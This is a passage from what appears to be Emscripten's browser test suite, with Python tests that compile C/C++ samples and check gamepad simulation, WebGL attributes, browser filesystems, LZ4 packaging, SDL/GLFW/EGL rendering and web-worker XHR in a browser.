for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
